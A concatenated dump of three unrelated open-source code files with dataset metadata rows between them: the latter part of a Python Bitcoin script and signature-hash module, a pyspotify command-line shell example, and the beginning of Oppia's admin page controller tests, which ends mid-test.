OP_VERIFY : 'OP_VERIFY',
OP_RETURN : 'OP_RETURN',
OP_TOALTSTACK : 'OP_TOALTSTACK',
OP_FROMALTSTACK : 'OP_FROMALTSTACK',
OP_2DROP : 'OP_2DROP',
OP_2DUP : 'OP_2DUP',
OP_3DUP : 'OP_3DUP',
OP_2OVER : 'OP_2OVER',
OP_2ROT : 'OP_2ROT',
OP_2SWAP : 'OP_2SWAP',
OP_IFDUP : 'OP_IFDUP',
OP_DEPTH : 'OP_DEPTH',
OP_DROP : 'OP_DROP',
OP_DUP : 'OP_DUP',
OP_NIP : 'OP_NIP',
OP_OVER : 'OP_OVER',
OP_PICK : 'OP_PICK',
OP_ROLL : 'OP_ROLL',
OP_ROT : 'OP_ROT',
OP_SWAP : 'OP_SWAP',
OP_TUCK : 'OP_TUCK',
OP_CAT : 'OP_CAT',
OP_SUBSTR : 'OP_SUBSTR',
OP_LEFT : 'OP_LEFT',
OP_RIGHT : 'OP_RIGHT',
OP_SIZE : 'OP_SIZE',
OP_INVERT : 'OP_INVERT',
OP_AND : 'OP_AND',
OP_OR : 'OP_OR',
OP_XOR : 'OP_XOR',
OP_EQUAL : 'OP_EQUAL',
OP_EQUALVERIFY : 'OP_EQUALVERIFY',
OP_RESERVED1 : 'OP_RESERVED1',
OP_RESERVED2 : 'OP_RESERVED2',
OP_1ADD : 'OP_1ADD',
OP_1SUB : 'OP_1SUB',
OP_2MUL : 'OP_2MUL',
OP_2DIV : 'OP_2DIV',
OP_NEGATE : 'OP_NEGATE',
OP_ABS : 'OP_ABS',
OP_NOT : 'OP_NOT',
OP_0NOTEQUAL : 'OP_0NOTEQUAL',
OP_ADD : 'OP_ADD',
OP_SUB : 'OP_SUB',
OP_MUL : 'OP_MUL',
OP_DIV : 'OP_DIV',
OP_MOD : 'OP_MOD',
OP_LSHIFT : 'OP_LSHIFT',
OP_RSHIFT : 'OP_RSHIFT',
OP_BOOLAND : 'OP_BOOLAND',
OP_BOOLOR : 'OP_BOOLOR',
OP_NUMEQUAL : 'OP_NUMEQUAL',
OP_NUMEQUALVERIFY : 'OP_NUMEQUALVERIFY',
OP_NUMNOTEQUAL : 'OP_NUMNOTEQUAL',
OP_LESSTHAN : 'OP_LESSTHAN',
OP_GREATERTHAN : 'OP_GREATERTHAN',
OP_LESSTHANOREQUAL : 'OP_LESSTHANOREQUAL',
OP_GREATERTHANOREQUAL : 'OP_GREATERTHANOREQUAL',
OP_MIN : 'OP_MIN',
OP_MAX : 'OP_MAX',
OP_WITHIN : 'OP_WITHIN',
OP_RIPEMD160 : 'OP_RIPEMD160',
OP_SHA1 : 'OP_SHA1',
OP_SHA256 : 'OP_SHA256',
OP_HASH160 : 'OP_HASH160',
OP_HASH256 : 'OP_HASH256',
OP_CODESEPARATOR : 'OP_CODESEPARATOR',
OP_CHECKSIG : 'OP_CHECKSIG',
OP_CHECKSIGVERIFY : 'OP_CHECKSIGVERIFY',
OP_CHECKMULTISIG : 'OP_CHECKMULTISIG',
OP_CHECKMULTISIGVERIFY : 'OP_CHECKMULTISIGVERIFY',
OP_NOP1 : 'OP_NOP1',
OP_NOP2 : 'OP_NOP2',
OP_NOP3 : 'OP_NOP3',
OP_NOP4 : 'OP_NOP4',
OP_NOP5 : 'OP_NOP5',
OP_NOP6 : 'OP_NOP6',
OP_NOP7 : 'OP_NOP7',
OP_NOP8 : 'OP_NOP8',
OP_NOP9 : 'OP_NOP9',
OP_NOP10 : 'OP_NOP10',
OP_SMALLINTEGER : 'OP_SMALLINTEGER',
OP_PUBKEYS : 'OP_PUBKEYS',
OP_PUBKEYHASH : 'OP_PUBKEYHASH',
OP_PUBKEY : 'OP_PUBKEY',
OP_INVALIDOPCODE : 'OP_INVALIDOPCODE',
})
OPCODES_BY_NAME = {
'OP_0' : OP_0,
'OP_PUSHDATA1' : OP_PUSHDATA1,
'OP_PUSHDATA2' : OP_PUSHDATA2,
'OP_PUSHDATA4' : OP_PUSHDATA4,
'OP_1NEGATE' : OP_1NEGATE,
'OP_RESERVED' : OP_RESERVED,
'OP_1' : OP_1,
'OP_2' : OP_2,
'OP_3' : OP_3,
'OP_4' : OP_4,
'OP_5' : OP_5,
'OP_6' : OP_6,
'OP_7' : OP_7,
'OP_8' : OP_8,
'OP_9' : OP_9,
'OP_10' : OP_10,
'OP_11' : OP_11,
'OP_12' : OP_12,
'OP_13' : OP_13,
'OP_14' : OP_14,
'OP_15' : OP_15,
'OP_16' : OP_16,
'OP_NOP' : OP_NOP,
'OP_VER' : OP_VER,
'OP_IF' : OP_IF,
'OP_NOTIF' : OP_NOTIF,
'OP_VERIF' : OP_VERIF,
'OP_VERNOTIF' : OP_VERNOTIF,
'OP_ELSE' : OP_ELSE,
'OP_ENDIF' : OP_ENDIF,
'OP_VERIFY' : OP_VERIFY,
'OP_RETURN' : OP_RETURN,
'OP_TOALTSTACK' : OP_TOALTSTACK,
'OP_FROMALTSTACK' : OP_FROMALTSTACK,
'OP_2DROP' : OP_2DROP,
'OP_2DUP' : OP_2DUP,
'OP_3DUP' : OP_3DUP,
'OP_2OVER' : OP_2OVER,
'OP_2ROT' : OP_2ROT,
'OP_2SWAP' : OP_2SWAP,
'OP_IFDUP' : OP_IFDUP,
'OP_DEPTH' : OP_DEPTH,
'OP_DROP' : OP_DROP,
'OP_DUP' : OP_DUP,
'OP_NIP' : OP_NIP,
'OP_OVER' : OP_OVER,
'OP_PICK' : OP_PICK,
'OP_ROLL' : OP_ROLL,
'OP_ROT' : OP_ROT,
'OP_SWAP' : OP_SWAP,
'OP_TUCK' : OP_TUCK,
'OP_CAT' : OP_CAT,
'OP_SUBSTR' : OP_SUBSTR,
'OP_LEFT' : OP_LEFT,
'OP_RIGHT' : OP_RIGHT,
'OP_SIZE' : OP_SIZE,
'OP_INVERT' : OP_INVERT,
'OP_AND' : OP_AND,
'OP_OR' : OP_OR,
'OP_XOR' : OP_XOR,
'OP_EQUAL' : OP_EQUAL,
'OP_EQUALVERIFY' : OP_EQUALVERIFY,
'OP_RESERVED1' : OP_RESERVED1,
'OP_RESERVED2' : OP_RESERVED2,
'OP_1ADD' : OP_1ADD,
'OP_1SUB' : OP_1SUB,
'OP_2MUL' : OP_2MUL,
'OP_2DIV' : OP_2DIV,
'OP_NEGATE' : OP_NEGATE,
'OP_ABS' : OP_ABS,
'OP_NOT' : OP_NOT,
'OP_0NOTEQUAL' : OP_0NOTEQUAL,
'OP_ADD' : OP_ADD,
'OP_SUB' : OP_SUB,
'OP_MUL' : OP_MUL,
'OP_DIV' : OP_DIV,
'OP_MOD' : OP_MOD,
'OP_LSHIFT' : OP_LSHIFT,
'OP_RSHIFT' : OP_RSHIFT,
'OP_BOOLAND' : OP_BOOLAND,
'OP_BOOLOR' : OP_BOOLOR,
'OP_NUMEQUAL' : OP_NUMEQUAL,
'OP_NUMEQUALVERIFY' : OP_NUMEQUALVERIFY,
'OP_NUMNOTEQUAL' : OP_NUMNOTEQUAL,
'OP_LESSTHAN' : OP_LESSTHAN,
'OP_GREATERTHAN' : OP_GREATERTHAN,
'OP_LESSTHANOREQUAL' : OP_LESSTHANOREQUAL,
'OP_GREATERTHANOREQUAL' : OP_GREATERTHANOREQUAL,
'OP_MIN' : OP_MIN,
'OP_MAX' : OP_MAX,
'OP_WITHIN' : OP_WITHIN,
'OP_RIPEMD160' : OP_RIPEMD160,
'OP_SHA1' : OP_SHA1,
'OP_SHA256' : OP_SHA256,
'OP_HASH160' : OP_HASH160,
'OP_HASH256' : OP_HASH256,
'OP_CODESEPARATOR' : OP_CODESEPARATOR,
'OP_CHECKSIG' : OP_CHECKSIG,
'OP_CHECKSIGVERIFY' : OP_CHECKSIGVERIFY,
'OP_CHECKMULTISIG' : OP_CHECKMULTISIG,
'OP_CHECKMULTISIGVERIFY' : OP_CHECKMULTISIGVERIFY,
'OP_NOP1' : OP_NOP1,
'OP_NOP2' : OP_NOP2,
'OP_NOP3' : OP_NOP3,
'OP_NOP4' : OP_NOP4,
'OP_NOP5' : OP_NOP5,
'OP_NOP6' : OP_NOP6,
'OP_NOP7' : OP_NOP7,
'OP_NOP8' : OP_NOP8,
'OP_NOP9' : OP_NOP9,
'OP_NOP10' : OP_NOP10,
'OP_SMALLINTEGER' : OP_SMALLINTEGER,
'OP_PUBKEYS' : OP_PUBKEYS,
'OP_PUBKEYHASH' : OP_PUBKEYHASH,
'OP_PUBKEY' : OP_PUBKEY,
}
class CScriptInvalidError(Exception):
"""Base class for CScript exceptions"""
pass
class CScriptTruncatedPushDataError(CScriptInvalidError):
"""Invalid pushdata due to truncation"""
def __init__(self, msg, data):
self.data = data
super(CScriptTruncatedPushDataError, self).__init__(msg)
# This is used, e.g., for block heights in coinbase scripts (BIP34).
class CScriptNum(object):
def __init__(self, d=0):
self.value = d
@staticmethod
def encode(obj):
r = bytearray(0)
if obj.value == 0:
return bytes(r)
neg = obj.value < 0
absvalue = -obj.value if neg else obj.value
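        # Emit the magnitude as little-endian base-256 bytes.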
while (absvalue):
            r.append(absvalue & 0xff)  # bytearray.append() takes an int, not a one-char string
absvalue >>= 8
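        # If the top byte already has its high bit set, append an extra byte to
        # carry the sign; otherwise fold the sign into the top byte's high bit.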
if r[-1] & 0x80:
r.append(0x80 if neg else 0)
elif neg:
r[-1] |= 0x80
return bytes(bchr(len(r)) + r)
class CScript(bytes):
"""Serialized script
A bytes subclass, so you can use this directly whenever bytes are accepted.
    Note that this means indexing does *not* work by opcode - indexing returns
    individual bytes rather than opcodes. This format was chosen for efficiency,
    so that the general case does not require creating a lot of little CScriptOp
    objects.
iter(script) however does iterate by opcode.
"""
@classmethod
def __coerce_instance(cls, other):
# Coerce other into bytes
if isinstance(other, CScriptOp):
other = bchr(other)
elif isinstance(other, CScriptNum):
if (other.value == 0):
other = bchr(CScriptOp(OP_0))
else:
other = CScriptNum.encode(other)
elif isinstance(other, (int, long)):
if 0 <= other <= 16:
other = bytes(bchr(CScriptOp.encode_op_n(other)))
elif other == -1:
other = bytes(bchr(OP_1NEGATE))
else:
other = CScriptOp.encode_op_pushdata(bignum.bn2vch(other))
elif isinstance(other, (bytes, bytearray)):
other = bytes(CScriptOp.encode_op_pushdata(other))
return other
def __add__(self, other):
# Do the coercion outside of the try block so that errors in it are
# noticed.
other = self.__coerce_instance(other)
try:
# bytes.__add__ always returns bytes instances unfortunately
return CScript(super(CScript, self).__add__(other))
except TypeError:
raise TypeError('Can not add a %r instance to a CScript' % other.__class__)
def join(self, iterable):
# join makes no sense for a CScript()
raise NotImplementedError
def __new__(cls, value=b''):
if isinstance(value, bytes) or isinstance(value, bytearray):
return super(CScript, cls).__new__(cls, value)
else:
def coerce_iterable(iterable):
for instance in iterable:
yield cls.__coerce_instance(instance)
# Annoyingly on both python2 and python3 bytes.join() always
# returns a bytes instance even when subclassed.
return super(CScript, cls).__new__(cls, b''.join(coerce_iterable(value)))
def raw_iter(self):
"""Raw iteration
Yields tuples of (opcode, data, sop_idx) so that the different possible
PUSHDATA encodings can be accurately distinguished, as well as
determining the exact opcode byte indexes. (sop_idx)
"""
i = 0
while i < len(self):
sop_idx = i
opcode = bord(self[i])
i += 1
if opcode > OP_PUSHDATA4:
yield (opcode, None, sop_idx)
else:
datasize = None
pushdata_type = None
if opcode < OP_PUSHDATA1:
pushdata_type = 'PUSHDATA(%d)' % opcode
datasize = opcode
elif opcode == OP_PUSHDATA1:
pushdata_type = 'PUSHDATA1'
if i >= len(self):
raise CScriptInvalidError('PUSHDATA1: missing data length')
datasize = bord(self[i])
i += 1
elif opcode == OP_PUSHDATA2:
pushdata_type = 'PUSHDATA2'
if i + 1 >= len(self):
raise CScriptInvalidError('PUSHDATA2: missing data length')
datasize = bord(self[i]) + (bord(self[i+1]) << 8)
i += 2
elif opcode == OP_PUSHDATA4:
pushdata_type = 'PUSHDATA4'
if i + 3 >= len(self):
raise CScriptInvalidError('PUSHDATA4: missing data length')
datasize = bord(self[i]) + (bord(self[i+1]) << 8) + (bord(self[i+2]) << 16) + (bord(self[i+3]) << 24)
i += 4
else:
assert False # shouldn't happen
data = bytes(self[i:i+datasize])
# Check for truncation
if len(data) < datasize:
raise CScriptTruncatedPushDataError('%s: truncated data' % pushdata_type, data)
i += datasize
yield (opcode, data, sop_idx)
def __iter__(self):
"""'Cooked' iteration
Returns either a CScriptOP instance, an integer, or bytes, as
appropriate.
See raw_iter() if you need to distinguish the different possible
PUSHDATA encodings.
"""
for (opcode, data, sop_idx) in self.raw_iter():
if data is not None:
yield data
else:
opcode = CScriptOp(opcode)
if opcode.is_small_int():
yield opcode.decode_op_n()
else:
yield CScriptOp(opcode)
def __repr__(self):
# For Python3 compatibility add b before strings so testcases don't
# need to change
def _repr(o):
if isinstance(o, bytes):
return "x('%s')" % binascii.hexlify(o).decode('utf8')
else:
return repr(o)
ops = []
i = iter(self)
while True:
op = None
try:
op = _repr(next(i))
except CScriptTruncatedPushDataError as err:
op = '%s...<ERROR: %s>' % (_repr(err.data), err)
break
except CScriptInvalidError as err:
op = '<ERROR: %s>' % err
break
except StopIteration:
break
finally:
if op is not None:
ops.append(op)
return "CScript([%s])" % ', '.join(ops)
def GetSigOpCount(self, fAccurate):
"""Get the SigOp count.
fAccurate - Accurately count CHECKMULTISIG, see BIP16 for details.
Note that this is consensus-critical.
"""
n = 0
lastOpcode = OP_INVALIDOPCODE
for (opcode, data, sop_idx) in self.raw_iter():
if opcode in (OP_CHECKSIG, OP_CHECKSIGVERIFY):
n += 1
elif opcode in (OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY):
if fAccurate and (OP_1 <= lastOpcode <= OP_16):
n += opcode.decode_op_n()
else:
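                    # Inaccurate counting charges the maximum of 20 pubkeys
                    # allowed per CHECKMULTISIG.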
n += 20
lastOpcode = opcode
return n
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
SIGHASH_ANYONECANPAY = 0x80
def FindAndDelete(script, sig):
"""Consensus critical, see FindAndDelete() in Satoshi codebase"""
r = b''
last_sop_idx = sop_idx = 0
skip = True
for (opcode, data, sop_idx) in script.raw_iter():
if not skip:
r += script[last_sop_idx:sop_idx]
last_sop_idx = sop_idx
if script[sop_idx:sop_idx + len(sig)] == sig:
skip = True
else:
skip = False
if not skip:
r += script[last_sop_idx:]
return CScript(r)
def SignatureHash(script, txTo, inIdx, hashtype):
"""Consensus-correct SignatureHash
Returns (hash, err) to precisely match the consensus-critical behavior of
the SIGHASH_SINGLE bug. (inIdx is *not* checked for validity)
"""
HASH_ONE = b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
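    # uint256(1) in little-endian form - the value the original client signs
    # when SIGHASH_SINGLE refers to a nonexistent output.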
if inIdx >= len(txTo.vin):
return (HASH_ONE, "inIdx %d out of range (%d)" % (inIdx, len(txTo.vin)))
txtmp = CTransaction(txTo)
for txin in txtmp.vin:
txin.scriptSig = b''
txtmp.vin[inIdx].scriptSig = FindAndDelete(script, CScript([OP_CODESEPARATOR]))
if (hashtype & 0x1f) == SIGHASH_NONE:
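        # SIGHASH_NONE: commit to no outputs; other inputs' nSequence is zeroed
        # so the signature does not commit to them.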
txtmp.vout = []
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
elif (hashtype & 0x1f) == SIGHASH_SINGLE:
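        # SIGHASH_SINGLE: commit only to the output at the same index as this
        # input; earlier outputs are blanked and other inputs' nSequence is
        # zeroed.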
outIdx = inIdx
if outIdx >= len(txtmp.vout):
return (HASH_ONE, "outIdx %d out of range (%d)" % (outIdx, len(txtmp.vout)))
tmp = txtmp.vout[outIdx]
txtmp.vout = []
for i in range(outIdx):
txtmp.vout.append(CTxOut())
txtmp.vout.append(tmp)
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
if hashtype & SIGHASH_ANYONECANPAY:
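        # SIGHASH_ANYONECANPAY: commit only to the input being signed; all
        # other inputs are dropped from the hashed transaction.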
tmp = txtmp.vin[inIdx]
txtmp.vin = []
txtmp.vin.append(tmp)
s = txtmp.serialize()
s += struct.pack(b"<I", hashtype)
hash = hash256(s)
return (hash, None)
| mit | -3,195,067,513,813,755,400 | 25.635045 | 146 | 0.566646 | false |
mopidy/pyspotify | examples/shell.py | 1 | 6169 | #!/usr/bin/env python
"""
This is an example of a simple command line client for Spotify using pyspotify.
You can run this file directly::
python shell.py
Then run the ``help`` command on the ``spotify>`` prompt to view all available
commands.
"""
from __future__ import print_function, unicode_literals
import cmd
import logging
import threading
import spotify
class Commander(cmd.Cmd):
doc_header = 'Commands'
prompt = 'spotify> '
logger = logging.getLogger('shell.commander')
def __init__(self):
cmd.Cmd.__init__(self)
self.logged_in = threading.Event()
self.logged_out = threading.Event()
self.logged_out.set()
self.session = spotify.Session()
self.session.on(
spotify.SessionEvent.CONNECTION_STATE_UPDATED,
self.on_connection_state_changed,
)
self.session.on(spotify.SessionEvent.END_OF_TRACK, self.on_end_of_track)
try:
self.audio_driver = spotify.AlsaSink(self.session)
except ImportError:
self.logger.warning(
'No audio sink found; audio playback unavailable.'
)
self.event_loop = spotify.EventLoop(self.session)
self.event_loop.start()
def on_connection_state_changed(self, session):
if session.connection.state is spotify.ConnectionState.LOGGED_IN:
self.logged_in.set()
self.logged_out.clear()
elif session.connection.state is spotify.ConnectionState.LOGGED_OUT:
self.logged_in.clear()
self.logged_out.set()
def on_end_of_track(self, session):
self.session.player.play(False)
def precmd(self, line):
if line:
self.logger.debug('New command: %s', line)
return line
def emptyline(self):
pass
def do_debug(self, line):
"Show more logging output"
print('Logging at DEBUG level')
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def do_info(self, line):
"Show normal logging output"
print('Logging at INFO level')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def do_warning(self, line):
"Show less logging output"
print('Logging at WARNING level')
logger = logging.getLogger()
logger.setLevel(logging.WARNING)
def do_EOF(self, line):
"Exit"
if self.logged_in.is_set():
print('Logging out...')
self.session.logout()
self.logged_out.wait()
self.event_loop.stop()
print('')
return True
def do_login(self, line):
"login <username> <password>"
tokens = line.split(' ', 1)
if len(tokens) != 2:
self.logger.warning("Wrong number of arguments")
return
username, password = tokens
self.session.login(username, password, remember_me=True)
self.logged_in.wait()
def do_relogin(self, line):
"relogin -- login as the previous logged in user"
try:
self.session.relogin()
self.logged_in.wait()
except spotify.Error as e:
self.logger.error(e)
def do_forget_me(self, line):
"forget_me -- forget the previous logged in user"
self.session.forget_me()
def do_logout(self, line):
"logout"
self.session.logout()
self.logged_out.wait()
def do_whoami(self, line):
"whoami"
if self.logged_in.is_set():
self.logger.info(
'I am %s aka %s. You can find me at %s',
self.session.user.canonical_name,
self.session.user.display_name,
self.session.user.link,
)
else:
self.logger.info(
'I am not logged in, but I may be %s',
self.session.remembered_user,
)
def do_play_uri(self, line):
"play <spotify track uri>"
if not self.logged_in.is_set():
self.logger.warning('You must be logged in to play')
return
try:
track = self.session.get_track(line)
track.load()
except (ValueError, spotify.Error) as e:
self.logger.warning(e)
return
self.logger.info('Loading track into player')
self.session.player.load(track)
self.logger.info('Playing track')
self.session.player.play()
def do_pause(self, line):
self.logger.info('Pausing track')
self.session.player.play(False)
def do_resume(self, line):
self.logger.info('Resuming track')
self.session.player.play()
def do_stop(self, line):
self.logger.info('Stopping track')
self.session.player.play(False)
self.session.player.unload()
def do_seek(self, seconds):
"seek <seconds>"
if not self.logged_in.is_set():
self.logger.warning('You must be logged in to seek')
return
if self.session.player.state is spotify.PlayerState.UNLOADED:
self.logger.warning('A track must be loaded before seeking')
return
self.session.player.seek(int(seconds) * 1000)
def do_search(self, query):
"search <query>"
if not self.logged_in.is_set():
self.logger.warning('You must be logged in to search')
return
try:
result = self.session.search(query)
result.load()
except spotify.Error as e:
self.logger.warning(e)
return
self.logger.info(
'%d tracks, %d albums, %d artists, and %d playlists found.',
result.track_total,
result.album_total,
result.artist_total,
result.playlist_total,
)
self.logger.info('Top tracks:')
for track in result.tracks:
self.logger.info(
'[%s] %s - %s', track.link, track.artists[0].name, track.name
)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
Commander().cmdloop()
| apache-2.0 | 3,352,281,336,376,357,000 | 28.516746 | 80 | 0.573999 | false |
kevinlee12/oppia | core/controllers/admin_test.py | 1 | 85129 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the admin page."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import logging
from constants import constants
from core import jobs
from core import jobs_registry
from core import jobs_test
from core.domain import collection_services
from core.domain import config_domain
from core.domain import config_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import opportunity_services
from core.domain import question_fetchers
from core.domain import recommendations_services
from core.domain import rights_manager
from core.domain import search_services
from core.domain import skill_services
from core.domain import stats_domain
from core.domain import stats_services
from core.domain import story_domain
from core.domain import story_fetchers
from core.domain import story_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.platform.taskqueue import gae_taskqueue_services as taskqueue_services
from core.tests import test_utils
import feconf
import utils
(exp_models, job_models, opportunity_models, audit_models) = (
models.Registry.import_models(
[models.NAMES.exploration, models.NAMES.job, models.NAMES.opportunity,
models.NAMES.audit]))
BOTH_MODERATOR_AND_ADMIN_EMAIL = '[email protected]'
BOTH_MODERATOR_AND_ADMIN_USERNAME = 'moderatorandadm1n'
class SampleMapReduceJobManager(jobs.BaseMapReduceOneOffJobManager):
"""Test job that counts the total number of explorations."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel]
@staticmethod
def map(item):
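        # Each ExplorationModel contributes one unit to the shared 'sum' key;
        # reduce() then adds the units up.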
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield (key, sum([int(value) for value in values]))
class AdminIntegrationTest(test_utils.GenericTestBase):
"""Server integration tests for operations on the admin page."""
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(AdminIntegrationTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
def test_admin_page_rights(self):
"""Test access rights to the admin page."""
self.get_html_response('/admin', expected_status_int=302)
# Login as a non-admin.
self.login(self.EDITOR_EMAIL)
self.get_html_response('/admin', expected_status_int=401)
self.logout()
# Login as an admin.
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.get_html_response('/admin')
self.logout()
def test_change_configuration_property(self):
"""Test that configuration properties can be changed."""
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
new_config_value = False
response_dict = self.get_json('/adminhandler')
response_config_properties = response_dict['config_properties']
self.assertDictContainsSubset({
'value': False,
}, response_config_properties[
config_domain.IS_IMPROVEMENTS_TAB_ENABLED.name])
payload = {
'action': 'save_config_properties',
'new_config_property_values': {
config_domain.IS_IMPROVEMENTS_TAB_ENABLED.name: (
new_config_value),
}
}
self.post_json('/adminhandler', payload, csrf_token=csrf_token)
response_dict = self.get_json('/adminhandler')
response_config_properties = response_dict['config_properties']
self.assertDictContainsSubset({
'value': new_config_value,
}, response_config_properties[
config_domain.IS_IMPROVEMENTS_TAB_ENABLED.name])
self.logout()
def test_cannot_reload_exploration_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot reload an exploration in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'reload_exploration',
'exploration_id': '2'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_load_new_structures_data_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot load new structures data in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_structures_data'
}, csrf_token=csrf_token)
self.logout()
def test_non_admins_cannot_load_new_structures_data(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
assert_raises_regexp = self.assertRaisesRegexp(
Exception, 'User does not have enough rights to generate data.')
with assert_raises_regexp:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_structures_data'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_generate_dummy_skill_data_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot generate dummy skills in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_skill_data'
}, csrf_token=csrf_token)
self.logout()
def test_non_admins_cannot_generate_dummy_skill_data(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
assert_raises_regexp = self.assertRaisesRegexp(
Exception, 'User does not have enough rights to generate data.')
with assert_raises_regexp:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_skill_data'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_reload_collection_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot reload a collection in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'reload_collection',
'collection_id': '2'
}, csrf_token=csrf_token)
self.logout()
def test_reload_collection(self):
observed_log_messages = []
def _mock_logging_function(msg, *args):
"""Mocks logging.info()."""
observed_log_messages.append(msg % args)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
collection_services.load_demo('0')
collection_rights = rights_manager.get_collection_rights('0')
self.assertFalse(collection_rights.community_owned)
with self.swap(logging, 'info', _mock_logging_function):
self.post_json(
'/adminhandler', {
'action': 'reload_collection',
'collection_id': '0'
}, csrf_token=csrf_token)
collection_rights = rights_manager.get_collection_rights('0')
self.assertTrue(collection_rights.community_owned)
self.assertEqual(
observed_log_messages,
[
'[ADMIN] %s reloaded collection 0' % self.admin_id,
'Collection with id 0 was loaded.'
]
)
self.logout()
def test_load_new_structures_data(self):
self.set_admins([self.ADMIN_USERNAME])
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_structures_data'
}, csrf_token=csrf_token)
topic_summaries = topic_services.get_all_topic_summaries()
self.assertEqual(len(topic_summaries), 2)
for summary in topic_summaries:
if summary.name == 'Dummy Topic 1':
topic_id = summary.id
story_id = (
topic_fetchers.get_topic_by_id(
topic_id).canonical_story_references[0].story_id)
self.assertIsNotNone(
story_fetchers.get_story_by_id(story_id, strict=False))
skill_summaries = skill_services.get_all_skill_summaries()
self.assertEqual(len(skill_summaries), 3)
questions, _, _ = (
question_fetchers.get_questions_and_skill_descriptions_by_skill_ids(
10, [
skill_summaries[0].id, skill_summaries[1].id,
skill_summaries[2].id], '')
)
self.assertEqual(len(questions), 3)
        # Test that there are 3 Hindi translation opportunities
        # available on the Contributor Dashboard. Hindi was picked arbitrarily;
        # any language code other than English (the language the dummy
        # explorations were written in) could be tested here.
translation_opportunities, _, _ = (
opportunity_services.get_translation_opportunities('hi', None))
self.assertEqual(len(translation_opportunities), 3)
self.logout()
def test_generate_dummy_skill_and_questions_data(self):
self.set_admins([self.ADMIN_USERNAME])
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_skill_data'
}, csrf_token=csrf_token)
skill_summaries = skill_services.get_all_skill_summaries()
self.assertEqual(len(skill_summaries), 1)
questions, _, _ = (
question_fetchers.get_questions_and_skill_descriptions_by_skill_ids(
20, [skill_summaries[0].id], '')
)
self.assertEqual(len(questions), 15)
self.logout()
def test_flush_migration_bot_contributions_action(self):
created_exploration_ids = ['exp_1', 'exp_2']
edited_exploration_ids = ['exp_3', 'exp_4']
user_services.create_user_contributions(
feconf.MIGRATION_BOT_USER_ID, created_exploration_ids,
edited_exploration_ids)
migration_bot_contributions_model = (
user_services.get_user_contributions(feconf.MIGRATION_BOT_USER_ID))
self.assertEqual(
migration_bot_contributions_model.created_exploration_ids,
created_exploration_ids)
self.assertEqual(
migration_bot_contributions_model.edited_exploration_ids,
edited_exploration_ids)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'flush_migration_bot_contribution_data'
}, csrf_token=csrf_token)
migration_bot_contributions_model = (
user_services.get_user_contributions(feconf.MIGRATION_BOT_USER_ID))
